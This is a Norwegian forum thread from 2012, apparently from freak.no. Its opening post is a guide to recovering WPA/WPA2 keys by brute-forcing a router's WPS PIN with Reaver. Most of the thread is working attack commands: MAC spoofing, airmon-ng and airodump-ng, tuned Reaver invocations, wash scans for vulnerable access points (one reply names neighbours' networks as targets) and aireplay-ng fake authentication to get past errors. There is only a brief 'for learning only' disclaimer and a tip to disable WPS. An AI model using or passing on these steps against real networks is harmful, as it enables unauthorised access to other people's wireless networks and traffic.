Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  36 7154
Og knekke WPA/WPA2 har lenge vært veldig vanskelig da dette er en mye bedre kryptering en WEP. Eneste måten har vært og fysisk gjette passordet ved hjelp av flere metoder som rainbowtables, bruteforce osv.
Dette krever ofte enormt med datakraft og lang tid.

Men slik er det ikke lengre. Det er faktisk mulig og få tak i nøkkelen på slike krypterte nettverk veldig enkelt.

Jeg skal først vise hvordan man gjør det også hvordan man kan beskytte seg.
Husk dette er kun for læring og jeg tar ikke noe ansvar for hva dette blir brukt til.

Svakheten vi skal utnytte er WPS. Altså Wireless Protected Setup som så og si alle nye routere leveres med i dag. (Les mer om WPS her)

Kort og enkelt forklart så bruker altså routeren en 8 talls kode ved WPS. Og det som er så flott er at når vi har gjettet de fire første så får vi en tilbakemelding på at dette er riktig kode. Så det er bare 10 000 muligheter.

Men en hake ved det er at det er en aktiv hack. Altså du kan ikke få tak i en handshake eller liggnende og bruteforce den offline.

Også er det slik at det er så og si bare routerne for hjemme brukere som leveres med dette. Og en noen få av dem har innebyggd et system som stopper dette ved at f.eks ved 10 mislykkede nøkkler må du vente i et minut eller to. Men dette er ikke så farlig det tar bare lengre tid.

Normalt tar det rundt 3-7 timer og gjennomføre et WPS angrep.

Dette virker kun på et skikkelig operativsystem som Linux. Så du trenger og ha Linux. En god distro for dette formålet vil være Backtrack.

Du trenger også og installere noe som heter Reaver. Det er dette vil skal bruke for og få tak i WPA passkeyen.

Info om Reaver:
- Om du avbryter lagrer den. Så du kan fortsette i ettertid. Så du kan angripe i 30 hver dag f.eks.
- Den prøver først pins som er vanlig og bruke av ISP´r og liggnende
- libpcap og libsqlite3 må være installert
- Om riktig WPS pin er gjettet sendes passordet i klartekst.
- Reaver bytter automatisk channel om routeren skifter det.

Last ned her:http://code.google.com/p/reaver-wps/downloads/list

Pakk ut i home folder f.eks.

Kode

cd ~/reaver
./configure
make
make install
Nå skal det være installert og vi kan starte.

Bytte Mac Adresse

Kode

ifconfig wlanX down //Stopper Wlan midlertidig
macchanger -r wlan0 //Skifter til random Mac Adresse
ifconfig wlanX up   //Starter Wlan igjen
Starte monitor

Kode

airmon-ng start wlanX
Finne nettverk

Kode

airodump-ng monX
Legg merke til kryptering, BSSID.

Det er flere muligheter. Mange routere tåler ikke et så kraftig live attack så pass på det. Om nettverket går ned så kan du prøve og sette litt mer tid mellom angrepene og diverse andre ting.

Basic

Kode

reaver -i monX -b BSSID
Output om hva den gjør skriver du (Noe som du bør alltid ha)

Kode

reaver -i monX -b BSSID -vv
Default er 1 sek delay mellom hvert forsøk men dette kan skiftes:

Kode

reaver -i monX -b BSSID -vv -d 0
Om du gjør dette lenge kan routeren bli treig eller gå ned så kan være lurt og legge til

Kode

reaver -i monX -b BSSID -vv -d 0 --dh-small
VIKTIG: Om du skal spoofe Mac Adressen må du ha med denne

Kode

reaver -i monX -b BSSID-vv -d 0 --dh-small --mac=MACADRESSE
Dette gjør at det blir belastning på routeren.

Det er flere ting du kan legge til men det er som regel ikke behov for dette.

Hvordan beskytte seg mot dette:
Det er enkelt. Slå av WPS på routeren din.

Generel WiFi guide:
- Bruk WPA
- Skjult SSID
- Mac Adresse Filter
- Slå av remote admin på router
- Kan slå av DHCP og kun bruke statisk IP
- Begrense antall enheter som får koble seg til
- Alltid bytt SSID. Aldri bruk default fra ISP.
- Om routeren har styrke instillinger prøv og sett på laveste og sjekk ytelsen og still opp etter det du trenger.
- Alltid ha siste og beste firmware.

Ikke begyn og si skjult ssid og mac adress filter hjelper ingen ting. Jeg vet at skjult ssid kan bli oppdaget kjempe lett. Men dette gir likevel et lite lag med sikkerhet. Her det snakk om og lage flest mulige lag av sikkerhet.

Mac adresse kan også spoofes lett men dette gir likevel et lag med sikkerhet. Det er ikke alle som gjerne tenker på det eller klarer og finne ut hvilke mac adresser som er godkjent.

Husk dette er kun for og vise hvor lett det er og hvorfor du ikke bør bruke WPA.
Sitat av MikalD Vis innlegg
Ikke begyn og si skjult ssid og mac adress filter hjelper ingen ting. Jeg vet at skjult ssid kan bli oppdaget kjempe lett. Men dette gir likevel et lite lag med sikkerhet. Her det snakk om og lage flest mulige lag av sikkerhet.

Mac adresse kan også spoofes lett men dette gir likevel et lag med sikkerhet. Det er ikke alle som gjerne tenker på det eller klarer og finne ut hvilke mac adresser som er godkjent.

Husk dette er kun for og vise hvor lett det er og hvorfor du ikke bør bruke WPA.
Vis hele sitatet...
Grunnen til at man sier at dette ikke er sikkerhet i, er fordi dem som faktisk bryter seg inn for å stjele sensitive data er FULLT klar over disse tingene.

Så skjule SSID og sette macfiltrering er scriptkiddiebeskyttelse, ingenting annet.
fin fin guide dette skal testes til helgen på et eget nett jeg har.. kp fra meg
Sitat av laxzzi Vis innlegg
Grunnen til at man sier at dette ikke er sikkerhet i, er fordi dem som faktisk bryter seg inn for å stjele sensitive data er FULLT klar over disse tingene.

Så skjule SSID og sette macfiltrering er scriptkiddiebeskyttelse, ingenting annet.
Vis hele sitatet...
Det er en dårlig scriptkiddiebeskyttelse isåfall, men det er ekstra jobb for kidden.

Ser på meg selv som en liten scriptkiddie og jeg klarte hvertfall å komme meg inn på WPA2-PSK med Mac-filtrering, etter en god del pjusk
Finnes det ikke en måte å slå på wps hos rutere der default wps er avslått og via dette programmet?(Synes jeg leste noe om dette i en engelsk guide til dette programmet forleden,men har sikkert missforstått
Finnes det ikke en måte å slå på wps hos rutere der default wps er avslått og via dette programmet?(Synes jeg leste noe om dette i en engelsk guide til dette programmet forleden,men har sikkert missforstått
Vis hele sitatet...
Nei, men det finnes en måte for å se om WPS faktisk er aktivert slik at man slipper å pøve seg frem.

Kode

./wash -i mon0
Her må man stå i src mappa til reaver når man kjører kommandoen
Hmm, jeg har koblet forsterkeren til anlegget mot nettet via WPS, slik at det er mulig å streame radoikanaler, usikker på om den lille dingsen jeg har er mulig å konfigurere til å autentisere mot ruteren på vanlig måte.....

Goddamn
Sist endret av znapper; 7. mars 2012 kl. 11:50.
Litt av en hack!




Oh wait..
Trigonoceps occipita
vidarlo's Avatar
Donor
Sitat av MikalD Vis innlegg
Ikke begyn og si skjult ssid og mac adress filter hjelper ingen ting. Jeg vet at skjult ssid kan bli oppdaget kjempe lett. Men dette gir likevel et lite lag med sikkerhet. Her det snakk om og lage flest mulige lag av sikkerhet.
Vis hele sitatet...
Det er verdilaust. Dei som lar seg stoppe av skjult SSID lar seg garantert stoppe av WPA2 - truleg WEP også. Det einaste sikkerhetstiltaket som hjelper er kryptert nett. Skru av DHCP, skjult SSID etc. er kun å gjere legitim tilgang vanskeligere.
Trådstarter
4 27
Hva er poenget med og fortelle om dette med SSID og MAC filter da jeg sa klart og tydlig at det kunne forbigås enkelt.
Det har egentlig lite og gjøre med hovedpoenget i denne tråden. Det var bare små generelle tips.

Fokuser heller på viktigere ting en slike små ting.
Sist endret av MikalD; 7. mars 2012 kl. 12:51.
Finnes det ingen tilsvarende metoder og programmer til windows?
Sitat av Membranplan Vis innlegg
Finnes det ingen tilsvarende metoder og programmer til windows?
Vis hele sitatet...
Problemet blir vel å finne drivere som støtter det. Finnes sikkert
Sitat av Membranplan Vis innlegg
Finnes det ingen tilsvarende metoder og programmer til windows?
Vis hele sitatet...
I windows: download virtualbox
download backtrack 5 r2:isoen som kommer med reaver
legg in backtrack i virtualbox og
skaff et trådløst usb-nettverkskort som støtter backtrack, f eks alfa-awus036H,finnes på ebay relativt billig
Sitat av freakztor Vis innlegg
Problemet blir vel å finne drivere som støtter det. Finnes sikkert
Vis hele sitatet...
Man har jo WinPcap til windows som brukes av wireshark, cain & able og slike programmer, men man må omskrive reaver om til å bruke WinPcap i steden får libpcap, som sikkert ennå ikkje er gjort.

Også er det jo ikkje alle wifi hardware som støtter denne typen angrep.

Men tipse mitt:
http://dc117.2shared.com/download/nuDY7uJo/linux.jpg?tsid=20120307-132200-cc24b6be

Installer Linux
Trigonoceps occipita
vidarlo's Avatar
Donor
Sitat av MikalD Vis innlegg
Hva er poenget med og fortelle om dette med SSID og MAC filter da jeg sa klart og tydlig at det kunne forbigås enkelt.
Vis hele sitatet...
Fordi du vel å nemne ting som er nyttelaust og gir dårlegare brukeropplevelse. Det er det motsette av det som bør vere målet med sikkerhetsmekanismer.

WPA2 gir dårlegare brukeropplevelse, men til gjengjeld reell sikkerhet.

Om temaet interesserer deg anbefaler eg Beyond Fear av Bruce Schneier, som tar for seg ein del interessante misforståelser rundt temaet. Den nyaste boka, Liars and Outliars omhandler forsåvidt mykje det samme - men meir sett i eit samfunnsperspektiv.
Trådstarter
4 27
Sitat av slashdot Vis innlegg
Fordi du vel å nemne ting som er nyttelaust og gir dårlegare brukeropplevelse. Det er det motsette av det som bør vere målet med sikkerhetsmekanismer.

WPA2 gir dårlegare brukeropplevelse, men til gjengjeld reell sikkerhet.

Om temaet interesserer deg anbefaler eg Beyond Fear av Bruce Schneier, som tar for seg ein del interessante misforståelser rundt temaet. Den nyaste boka, Liars and Outliars omhandler forsåvidt mykje det samme - men meir sett i eit samfunnsperspektiv.
Vis hele sitatet...
Det er sant at det blir vanskeligere og bruke wifi. Jeg nevnte bare noen få enkle ting som folk kan gjøre. De trenger ikke.

Man kan også sette opp Radius som vil gjøre det meget vanskelig og knekke. Men det er ikke for hvermansen.

Takk for infoen om boken.
Sist endret av MikalD; 8. mars 2012 kl. 08:26.
KP for at du tok deg tid til å skrive og poste guiden
Det her skal testes!
Hjerneskadet Shitkid
CHillZoNE's Avatar
Hvorfor er det så mye dårligere "bruker opplevelse" på wpa2?

Fungerer da aldeles utmerket her!
Vil dette fungere på WPA-PSK nettverk?
Sitat av kapsen Vis innlegg
Nei, men det finnes en måte for å se om WPS faktisk er aktivert slik at man slipper å pøve seg frem.

Kode

./wash -i mon0
Her må man stå i src mappa til reaver når man kjører kommandoen
Vis hele sitatet...
"[X] ERROR: Failed to compile packet filter" ved aa skrive ./wash -i mon0 paa terminalen..
Sitat av CHillZoNE Vis innlegg
Hvorfor er det så mye dårligere "bruker opplevelse" på wpa2?

Fungerer da aldeles utmerket her!
Vis hele sitatet...
Det er en dårligere brukeropplevelse i den form at du må skrive passord for å kunne benytte det trådløse nettet, og du får et marginalt ytelsestap pga. krypteringen som maskinen din blir nødt til å gjennomføre.

Generelt sett vil alle sikkerhetstiltak gjøre det verre for legitime OG illegitime brukere i et gitt system. I tilfellene hvor påvirkningsgraden er sterkt i den legitimes favør vil det lønne seg å implementere tiltaket.

Skjuling av SSID er like effektivt som å fjerne alle lyskilder fra rommet hvor du har gjemt safen din. Det stopper kanskje tilfeldige forbipasserende fra å i det hele tatt oppdage at du har en safe, men det gjør det ikke noe særlig vanskeligere å åpne den.
Sist endret av Dyret; 9. mars 2012 kl. 00:09.
Ridder av 1. klasse
Sitat av MikalD Vis innlegg
Og knekke WPA/WPA2 har lenge vært veldig vanskelig da dette er en mye bedre kryptering en WEP.
Vis hele sitatet...

Ble litt forvirret nå... Du skriver WPA/WPA2?

Hvilken kryptering er det denne guiden knekker? WPA? eller WPA2?
Sist endret av Mchjort; 9. mars 2012 kl. 00:28.
Sitat av Lacost33 Vis innlegg
Vil dette fungere på WPA-PSK nettverk?
Vis hele sitatet...
Ja, om ruteren din har wps aktivert
Sist endret av villniss; 9. mars 2012 kl. 08:04.
We got machetes!
Andre programmer en reaver jeg kan bruke til dette ?? som allerede er installert i Backtrack4.
Hei!

Må legge til at det følger med en snedig funksjon på reaver-programvaren.

For å sjekke hva slags nett som er sårbar for WPS-attack, kan man bruke kommandoen wash -i mon0.


Mvh!
Sist endret av saftus; 10. mars 2012 kl. 12:09.
Sitat av Junglemafia Vis innlegg
Andre programmer en reaver jeg kan bruke til dette ?? som allerede er installert i Backtrack4.
Vis hele sitatet...
Tror ikke det. Mulig att d går og kompilere sammen en egen versjon/eget script av reaver utifra de verktøy som eri versjon 4 av backtrack,men tviler..
Sitat av saftus Vis innlegg
Hei!

Må legge til at det følger med en snedig funksjon på reaver-programvaren.

For å sjekke hva slags nett som er sårbar for WPS-attack, kan man bruke kommandoen wash -i mon0.


Mvh!
Vis hele sitatet...
Vet du hvorfor jeg får "[X] ERROR: Failed to compile packet filter" etter å ha skrevet kommandoen wash -i mon0. ?
Zirto, jeg er usikker på det gitt. Du kan prøve å se litt rundt på issues hos Reaver-WPS. Ser det er noen som har samme problem.

Mvh!
Sitat av saftus Vis innlegg
Zirto, jeg er usikker på det gitt. Du kan prøve å se litt rundt på issues hos Reaver-WPS. Ser det er noen som har samme problem.

Mvh!
Vis hele sitatet...
Linken du referer til sier ikke så mye.. Men uansett så har jeg skrevet airmon-ng start wlan0. og fikk opp mon0 som monitor mode. Kjørte så sudo wash -i mon0 og får alltid det samme feilmeldingen..
Nå som backtracker 5 r2 er ute, så ligger Reaver ferdig installert. (hvis bruker vmware må du ha versjon 8)
Walsh har byttet navn til Wash

bare skrive det her i consolen:
airmon-ng
Se etter wlan kort som kommer opp, hoss meg wlan0
airmon-ng start wlan0
Da vil den si start med adapter mon0 (siste tegnet er tallet null)

For å finne ut hvem/hvilken ap/nabo som kjører wps, skriv:
wash -C -i mon0 (husk C må være stor bokstav, ellers velger den kanal), vent 10-30sek, den vil gi deg liste på skjermen med mac/ssid/kanal, copy past den, eller åpne ny consol er anbefalt siden veldig nytt for slippe skrive av for mye.

når du har valgt ut mål så skriv:
reaver -i mon0 -b 00:24:01:00:00:00
00:24:01:00:00:00 er mac addresen som du finner med wash (copy/past er fint)

så er det bare vente.... har du dårlig singal så kan du sett den til fast kanal osv...
Sitat av ontheroad Vis innlegg
Nå som backtracker 5 r2 er ute, så ligger Reaver ferdig installert. (hvis bruker vmware må du ha versjon 8)
Walsh har byttet navn til Wash

bare skrive det her i consolen:
airmon-ng
Se etter wlan kort som kommer opp, hoss meg wlan0
airmon-ng start wlan0
Da vil den si start med adapter mon0 (siste tegnet er tallet null)

For å finne ut hvem/hvilken ap/nabo som kjører wps, skriv:
wash -C -i mon0 (husk C må være stor bokstav, ellers velger den kanal), vent 10-30sek, den vil gi deg liste på skjermen med mac/ssid/kanal, copy past den, eller åpne ny consol er anbefalt siden veldig nytt for slippe skrive av for mye.

når du har valgt ut mål så skriv:
reaver -i mon0 -b 00:24:01:00:00:00
00:24:01:00:00:00 er mac addresen som du finner med wash (copy/past er fint)

så er det bare vente.... har du dårlig singal så kan du sett den til fast kanal osv...
Vis hele sitatet...
1+

Nå funker det gitt. Men det bruker jo all verdens tid har hatt pcen i minst 3 timer så er den ennå på 5.08 % ..
Sitat av Zirto Vis innlegg
1+

Nå funker det gitt. Men det bruker jo all verdens tid har hatt pcen i minst 3 timer så er den ennå på 5.08 % ..
Vis hele sitatet...
Den går veldig sakte på førsten, men med enn gang første del av key er finnet vil den hoppe til 90%

hvis du får mye error eller den går veldig sagte, så prøv og flytte pc'en der du har bedre signal så går den mye raskere, rekorden min er 3 key i sek, da satt jeg 1m fra router.

normalt er alt fra 5-20key pr min.
Sitat av ontheroad Vis innlegg
Den går veldig sakte på førsten, men med enn gang første del av key er finnet vil den hoppe til 90%

hvis du får mye error eller den går veldig sagte, så prøv og flytte pc'en der du har bedre signal så går den mye raskere, rekorden min er 3 key i sek, da satt jeg 1m fra router.

normalt er alt fra 5-20key pr min.
Vis hele sitatet...
Signalet er helt greit. Bruker denne AWUS036NHR 2000mW. Men derimot feilmeldinger får jeg "WPS transaction failed" og "Waring: receive timeout occurred" Akkurat nå er det 11 key i sek.. var 3 istad..
Med 3 pin pr sek så hadde du vært mye høyere etter tre timer.
Får du mange feilmeldinger så kan du prøve med -d og antal sekunder du ligger på pr pin. Også -N har vært brukbar for min del.
Sist endret av InTrance; 18. mars 2012 kl. 02:19.
Sitat av InTrance Vis innlegg
Med 3 pin pr sek så hadde du vært mye høyere etter tre timer.
Får du mange feilmeldinger så kan du prøve med -d og antal sekunder du ligger på pr pin. Også -N har vært brukbar for min del.
Vis hele sitatet...
Kunne du utdype hva du bruker her? altså kommandolinje.. ?
Sitat av Zirto Vis innlegg
Kunne du utdype hva du bruker her? altså kommandolinje.. ?
Vis hele sitatet...

Kode

reaver -i monX -b AA:AA:AA:AA:AA:AA -m BB:BB:BB:BB:BB:BB -vv -d 10 -N -S
-N = --no-nack
-S = --dh-small
-m = --mac=

Jeg opplevde også feilmeldinger av type:

Kode

WPS transaction failed (code: 0x02), re-trying last pin
WPS transaction failed (code: 0x03), re-trying last pin
Samtidig som sek/pin var 0. Da fikk jeg den opp og gå med å bruke aireplay-ng med fake auth.

Kode

aireplay-ng -1 120 -a AA:AA:AA:AA:AA:AA -h BB:BB:BB:BB:BB:BB -e navnpånettverk monX